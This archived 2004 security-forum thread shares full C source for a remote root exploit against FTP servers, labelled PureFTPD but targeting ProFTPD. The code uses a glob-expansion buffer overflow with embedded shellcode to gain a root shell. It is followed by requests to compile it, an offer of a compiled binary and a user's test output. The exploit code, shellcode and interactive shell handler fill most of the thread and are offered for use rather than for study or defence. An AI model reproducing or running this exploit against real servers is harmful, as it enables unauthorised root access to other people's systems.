Remote Root Exploit For Pureftpd 1.x.x

Full Version: Remote Root Exploit For Pureftpd 1.x.x

GovernmentSecurity.org > The Archives > Public Downloads

z3r0

Jul 17 2004, 09:02 PM

hi again
i know its laaame but, anyway please compile it or tell me the link for the compiled code
thanks a lot, z3r0

QUOTE

/*
PureFTPD (1.x.x) linux/x86 remote ROOT exploit.
!PRIVATE!***!PRIVATE!***!PRIVATE!***!PRIVATE!***!PRIVATE!***!PRIVATE!***!PRIVATE!
exploit by setg1d(setg1d@neointernet.com).
------------------------------------------
FTP glob Expansion Vulnerability.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <ctype.h>
#include <pwd.h>

#define FTP_PORT 21
#define MAXX(a,

((a) < (

? (

: (a))

#define NOP 0x41 /* inc %ecx, works just like a nop, easier to read */

extern int errno;

int debug_read;
int debug_write;

/*
* Non-ripped 45 byte linux shellcode which does setuid(0) and execve()
* and does not contain any '/' characters.
*/
char lincode[] =
"\x29\xc0\x50\xb0\x17\x50\xcd\x80"
"\x29\xc0\x50\xbf\x66\x69\x73\x68"
"\x29\xf6\x66\xbe\x49\x46\x31\xfe"
"\x56\xbe\x49\x0b\x1a\x06\x31\xfe"
"\x56\x89\xe3\x50\x54\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

/* architecture structure */
struct arch {
char *description;
char *shellcode;
unsigned long code_addr;
};

/* available targets */
struct arch archlist[] =
{
{ "Linux/x86 ProFTPD", lincode, 0xbfbfc2a8 }
};

/*
* function prototypes.
*/
void *Malloc(size_t);
void *Realloc(void *, size_t);
char *Strdup(char *);
int get_ip(struct in_addr *, char *);
int tcp_connect(char *, unsigned int);
ssize_t write_sock(int, void *, size_t);
ssize_t read_sock(int, void *, size_t);
int ftp_login(int, char *, char *);
char *ftp_gethomedir(int);
int ftp_mkdir(int, char *);
int ftp_chdir(int, char *);
int ftp_quit(int);
void possibly_rooted(int);
void send_glob(int, char *);
char *random_string(void);
int ftp_glob_exploit(int, char *, unsigned long, char *);
int verify_shellcode(char *);
void usage(char *);
void list_targets(void);

/*
* Error cheq'n wrapper for malloc.
*/
void *Malloc(size_t n)
{
void *tmp;

if((tmp = malloc(n)) == NULL)
{
fprintf(stderr, "malloc(%u) failed! exiting...\n", n);
exit(EXIT_FAILURE);
}

return tmp;
}

/*
* Error cheq'n strdup.
*/
char *Strdup(char *str)
{
char *s;

if((s = strdup(str)) == NULL)
{
fprintf(stderr, "strdup failed! exiting...\n");
exit(EXIT_FAILURE);
}

return s;
}

/*
* translates a host from its string representation (either in numbers
* and dots notation or hostname format) into its binary ip address
* and stores it in the in_addr struct passed in.
*
* return values: 0 on success, != 0 on failure.
*/
int get_ip(struct in_addr *iaddr, char *host)
{
struct hostent *hp;

/* first check to see if its in num-dot format */
if(inet_aton(host, iaddr) != 0)
return 0;

/* next, do a gethostbyname */
if((hp = gethostbyname(host)) != NULL)
{
if(hp->h_addr_list != NULL)
{
memcpy(&iaddr->s_addr, *hp->h_addr_list, sizeof(iaddr->s_addr));
return 0;
}
return -1;
}

return -1;
}

/*
* initiates a tcp connection to the specified host (either in
* ip format (xxx.xxx.xxx.xxx) or as a hostname (microsoft.com)
* to the host's tcp port.
*
* return values: != -1 on success, -1 on failure.
*/
int tcp_connect(char *host, unsigned int port)
{
int sock;
struct sockaddr_in saddress;
struct in_addr *iaddr;

iaddr = Malloc(sizeof(struct in_addr));

/* write the hostname information into the in_addr structure */
if(get_ip(iaddr, host) != 0)
return -1;

saddress.sin_addr.s_addr = iaddr->s_addr;
saddress.sin_family = AF_INET;
saddress.sin_port = htons(port);

/* create the socket */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;

/* make the connection */
if(connect(sock, (struct sockaddr *) &saddress, sizeof(saddress)) != 0)
{
close(sock);
return -1;
}

/* everything succeeded, return the connected socket */
return sock;
}

/*
* a wrapper for write to enable us to do some debugging.
*/
ssize_t write_sock(int fd, void *buf, size_t count)
{
unsigned int i;

if(debug_write == 1)
{
printf(" > ");
for(i = 0; i < count; i++)
printf("%c", ((char *)buf)[i]);
fflush(stdout);
}

return write(fd, buf, count);
}

/*
* a wrapper for read to enable us to some debugging.
*/
ssize_t read_sock(int fd, void *buf, size_t count)
{
unsigned int i;
ssize_t r;

r = read(fd, buf, count);

if(debug_read == 1)
{
printf(" < ");
for(i = 0; i < r; i++)
printf("%c", ((char *)buf)[i]);
fflush(stdout);
}

return r;
}

/*
* FTP LOGIN function. Issues a "USER <username> and then "PASS <password>"
* to login to the remote host and checks that command succeeded.
*/
int ftp_login(int sock, char *username, char *password)
{
char recvbuf[256];
char *sendbuf;
int r;

/* get the header */
read_sock(sock, recvbuf, 255);

sendbuf = Malloc((MAXX(strlen(username), strlen(password)) + 7) *
sizeof(char));

sprintf(sendbuf, "USER %s\n", username);

write_sock(sock, sendbuf, strlen(sendbuf));
r = read_sock(sock, recvbuf, 255);
recvbuf[r] = 0x0;

if(atoi(recvbuf) != 331)
return 0;

sprintf(sendbuf, "PASS %s\n", password);

write_sock(sock, sendbuf, strlen(sendbuf));
r = read_sock(sock, recvbuf, 255);
recvbuf[r] = 0x0;

free(sendbuf);

if(atoi(recvbuf) == 230)
return 1;

return 0;
}

/*
* FTP GET HOME DIR function. Issues a "CWD ~" and "PWD" to
* force the ftp daemon to print our our current directory.
*/
char *ftp_gethomedir(int sock)
{
char recvbuf[256];
char *homedir = NULL;
int r;

write_sock(sock, "CWD ~\n", 6);
r = read_sock(sock, recvbuf, 255);
recvbuf[r] = 0x0;

if(atoi(recvbuf) == 250)
{
write_sock(sock, "PWD\n", 4);
r = read_sock(sock, recvbuf, 255);
recvbuf[r] = 0x0;

if(atoi(recvbuf) == 257)
{
char *front, *back;

front = strchr(recvbuf, '"');
front++;
back = strchr(front, '"');

homedir = Malloc((back - front) * sizeof(char));
strncpy(homedir, front, (back - front));
homedir[(back - front)] = 0x0;
}
}

return homedir;
}

/*
* FTP MKDIR function. Issues an "MKD <dirname>" to create a directory on
* the remote host and checks that the command succeeded.
*/
int ftp_mkdir(int sock, char *dirname)
{
char recvbuf[512];
char *sendbuf;
int r;

sendbuf = Malloc((strlen(dirname) + 6) * sizeof(char));
sprintf(sendbuf, "MKD %s\n", dirname);

write_sock(sock, sendbuf, strlen(sendbuf));
r = read_sock(sock, recvbuf, 511);
recvbuf[r] = 0x0;

free(sendbuf);

if(atoi(recvbuf) == 257)
return 1;

return 0;
}

/*
* FTP CWD function. Issues a "CWD <dirname>" to change directory on
* the remote host and checks that the command succeeded.
*/
int ftp_chdir(int sock, char *dirname)
{
char recvbuf[512];
char *sendbuf;
int r;

sendbuf = Malloc((strlen(dirname) + 6) * sizeof(char));
sprintf(sendbuf, "CWD %s\n", dirname);

write_sock(sock, sendbuf, strlen(sendbuf));
r = read_sock(sock, recvbuf, 511);
recvbuf[r] = 0x0;

free(sendbuf);

if(atoi(recvbuf) == 250)
return 1;

return 0;
}

/*
* FTP QUIT function. Issues a "QUIT" to terminate the connection.
*/
int ftp_quit(int sock)
{
char recvbuf[256];
int r;

write_sock(sock, "QUIT\n", 5);
r = read_sock(sock, recvbuf, 255);
recvbuf[r] = 0x0;

close(sock);
return 1;
}

/*
* switches between the user and the remote shell (if everything went well).
*/
void possible_shell(int sock)
{
char banner[] =
"cd /; echo; uname -a; echo; id; echo; echo Welcome to the shell, "
"enter commands at will; echo;\n\n";

char buf[1024];
fd_set fds;
int r;

write(sock, banner, strlen(banner));

for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sock, &fds);
select(255, &fds, NULL, NULL, NULL);

if(FD_ISSET(sock, &fds))
{
memset(buf, 0x0, sizeof(buf));
r = read (sock, buf, sizeof(buf) - 1);
if(r <= 0)
{
printf("Connection closed.\n");
exit(EXIT_SUCCESS);
}
printf("%s", buf);
}

if(FD_ISSET(fileno(stdin), &fds))
{
memset(buf, 0x0, sizeof(buf));
read(fileno(stdin), buf, sizeof(buf) - 1);
write(sock, buf, strlen(buf));
}
}
close(sock);
}

/*
* generates a string of 6 random characters.
* this is too allow for multiple successful runs, best way to do
* this is to actually remove the created directories.
*/
char *random_string(void)
{
int i;
char *s = Malloc(7);

srand(time(NULL));
for(i = 0; i < 6; i++)
s[i] = (rand() % (122 - 97)) + 97;

s[i] = 0x0;
return s;
}

/*
* sends the glob string, to overflow the daemon.
*/
void send_glob(int sock, char *front)
{
char globbed[] = "CWD ~/NNNNNN*/X*/X*/X*\n";
int i, j;

for(i = 6, j = 0; i < 6 + 6; i++, j++)
globbed[i] = front[j];

write_sock(sock, globbed, strlen(globbed));

printf("[5] Globbed commands sent.\n");

/* start our shell handler */
possible_shell(sock);
}

/*
* Exploitation routine.
* Makes 4 large directories and then cwd's to them.
*/
int ftp_glob_exploit(int sock, char *homedir, unsigned long addy, char
*shellcode)
{
char dir[300];
int i, j;
int total = strlen(homedir) + 1;
int align2;
char *rstring = random_string();

/* go to the writeable directory */
if(!ftp_chdir(sock, homedir))
{
fprintf(stderr, "[-] Failed to change directory, aborting!\n");
return 0;
}

for(i = 0; i < 4; i++)
{
memset(dir, 0x0, 299);

switch(i)
{
case 0: /* first dir == shellcode */
memcpy(dir, rstring, strlen(rstring));
memset(dir + strlen(rstring), NOP, 255 - strlen(rstring));
strcpy(&dir[(255 - strlen(shellcode))], shellcode);
break;

case 3: /* address buffer */
/* calculate the alignment */
align2 = total % sizeof(long);
align2 = sizeof(long) - align2;

printf("[3] Calculated alignment = %d, total = %d\n",
align2, total);

strcpy(dir, "XXXX");
memset(dir + 4, 'X', align2);

for(j = 4 + align2; j < 250; j += 4)
*(unsigned long *)(&dir[j]) = addy;
break;

default: /* cases 1 and 2, extra overflow bytes */
memset(dir, 'X', 255);
break;

}

total += strlen(dir) + 1;

if(!ftp_mkdir(sock, dir))
{
fprintf(stderr, "[-] Failed to generate directories, aborting!\n");
return 0;
}

if(!ftp_chdir(sock, dir))
{
fprintf(stderr, "[-] Failed to change directory, aborting!\n");
return 0;
}
}

printf("[4] Evil directories created.\n");

if(!ftp_chdir(sock, homedir))
{
fprintf(stderr, "[-] Failed to cwd back to %s, aborting!\n", homedir);
return 0;
}

/* perform the final attack */
send_glob(sock, rstring);

return 1;
}

/*
* returns true if the shellcode passes, false otherwise.
*/
int verify_shellcode(char *code)
{
int i, s = 0;

if(strlen(code) > 255)
{
fprintf(stderr, "[-] Shellcode length exceeds 255, aborting!\n");
return 0;
}

for(i = 0; i < strlen(code); i++)
{
if(code[i] == '/')
s++;
}

if(s > 0)
{
fprintf(stderr,
"[-] Shellcode contains %u slash characters, aborting\n", s);
return 0;
}

return 1;
}

/*
* displays the usage message and exits.
*/
void usage(char *p)
{
fprintf(stderr,
"Linux/x86 PureFTPD remote exploit.\n"
"usage: %s [options]\n"
"\t-c\tremote host to connect to\n"
"\t-o\tremote port to use\n"
"\t-u\tremote username\n"
"\t-p\tremote password\n"
"\t-i\tget the password interactively\n"
"\t-t\tpredefined target (\"-t list\" to list all targets)\n"
"\t-d\twriteable directory\n"
"\t-l\tshellcode address\n"
"\t-v\tdebug level [0-2]\n"
"\t-s\tseconds to sleep after login (debugging purposes)\n"
"\t-h\tdisplay this help\n", p);

exit(EXIT_FAILURE);
}

/*
* lists all available targets.
*/
void list_targets(void)
{
int i;

printf("Available Targets:\n");

for(i = 0; i < sizeof(archlist) / sizeof(struct arch); i++ )
printf("%i: %s\n", i, archlist[i].description);

return;
}

int main(int argc, char **argv)
{
int sock, c;
int port = FTP_PORT;
int debuglevel = 0;
char *host = NULL;
char *username = NULL;
char *password = NULL;

struct arch *arch = NULL;
char *shellcode = lincode;
int target = 0;
int sleep_time = 0;
unsigned long code_addr = 0;
char *homedir = NULL;;

printf("\n\n Downlaod .:: www.WOW-TEAM.org/spaker ::.\n\n");
/* grab command line parameters */
while((c = getopt(argc, argv, "c:o:u:p:it:d:l:v:s:h")) != EOF)
{
switch©
{
case 'c':
host = Strdup(optarg);
break;

case 'o':
port = atoi(optarg);
break;

case 'u':
username = Strdup(optarg);
break;

case 'p':
password = Strdup(optarg);
/* hide the password from ps */
memset(optarg, 'X', strlen(optarg));
break;

case 'i':
password = getpass("Enter remote password: ");
break;

case 't':
if(strcmp(optarg, "list") == 0)
{
list_targets();
return EXIT_FAILURE;
}

target = atoi(optarg);
arch = &(archlist[target]);
code_addr = arch->code_addr;
shellcode = arch->shellcode;
break;

case 'd':
homedir = Strdup(optarg);
break;

case 'l':
code_addr = strtoul(optarg, NULL, 0);
break;

case 'v':
debuglevel = atoi(optarg);
break;

case 's':
sleep_time = atoi(optarg);
break;

default:
usage(argv[0]);
break;
}
}

/* check for required options */
if(host == NULL || username == NULL || password == NULL || code_addr == 0)
usage(argv[0]);

/* setup the debug level */
switch(debuglevel)
{
case 1:
debug_read = 1;
debug_write = 0;
break;

case 2:
debug_read = 1;
debug_write = 1;
break;

default:
debug_read = 0;
debug_write = 0;
break;
}

/* make sure the shellcode is good */
if(!verify_shellcode(shellcode))
return EXIT_FAILURE;

/* initiate the tcp connection to the ftp server */
if((sock = tcp_connect(host, port)) == -1)
{
fprintf(stderr, "[-] Connection to %s failed!\n", host);
ftp_quit(sock);
return EXIT_FAILURE;
}

if(arch == NULL)
printf("[0] Connected to host %s.\n", host);
else
printf("[0] Connected to host %s\n\tAs type %s.\n",
host, arch->description);

/* login */
if(!ftp_login(sock, username, password))
{
fprintf(stderr, "[-] Login failed, aborting!\n");
ftp_quit(sock);
return EXIT_FAILURE;
}

/* hey, so im anal! */
memset(password, 0x0, strlen(password));
free(username);
free(password);

printf("[1] Login succeeded.\n");

if(sleep != 0)
sleep(sleep_time);

if(homedir == NULL)
{
/* get home directory */
if((homedir = ftp_gethomedir(sock)) == NULL)
{
fprintf(stderr, "[-] Couldn't retrieve home directory, aborting!\n");
ftp_quit(sock);
return EXIT_FAILURE;
}
}

printf("[2] Home directory retrieved as \"%s\", %u bytes.\n",
homedir, strlen(homedir));

/* do the exploitation */
if(!ftp_glob_exploit(sock, homedir, code_addr, shellcode))
{
fprintf(stderr, "[-] exploit failed, aborting!\n");
ftp_quit(sock);
return EXIT_FAILURE;
}

ftp_quit(sock);

free(host);
return EXIT_SUCCESS;
}

z3r0

Jul 17 2004, 09:06 PM

wtf so its looks like this

#define MAXX(a,

((a) < (

? (

: (a))

z3r0

Jul 17 2004, 09:10 PM

#define MAXX(a,b) ((a) < (b) ? (b) : (a))

grrr

BlaStA

Jul 17 2004, 09:23 PM

Compiled with cygwin. Didn't test it.

z3r0

Jul 17 2004, 11:21 PM

thank you a lot BlatSa!respect!

Comedy

Jul 18 2004, 07:19 AM

thanks for compiling, didn't work though so i recompiled myself.

Oops, it did work. it was my compile that doesnt

twistedps

Jul 18 2004, 07:26 AM

CODE

[0] Connected to host localhost
As type Linux/x86 ProFTPD.
[1] Login succeeded.
[2] Home directory retrieved as "/home/joshg", 11 bytes.
[-] Failed to change directory, aborting!
[-] exploit failed, aborting!

1.2.9 on fedora core 2 seems to be patched.

aapje

Jul 18 2004, 03:20 PM

that is because its an old exploit

t0bban

Jul 18 2004, 11:05 PM

QUOTE (Comedy @ Jul 18 2004, 07:19 AM)

thanks for compiling, didn't work though so i recompiled myself.

Oops, it did work. it was my compile that doesnt

lol
Getting late is it? :-)

Keep up the good work guys.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.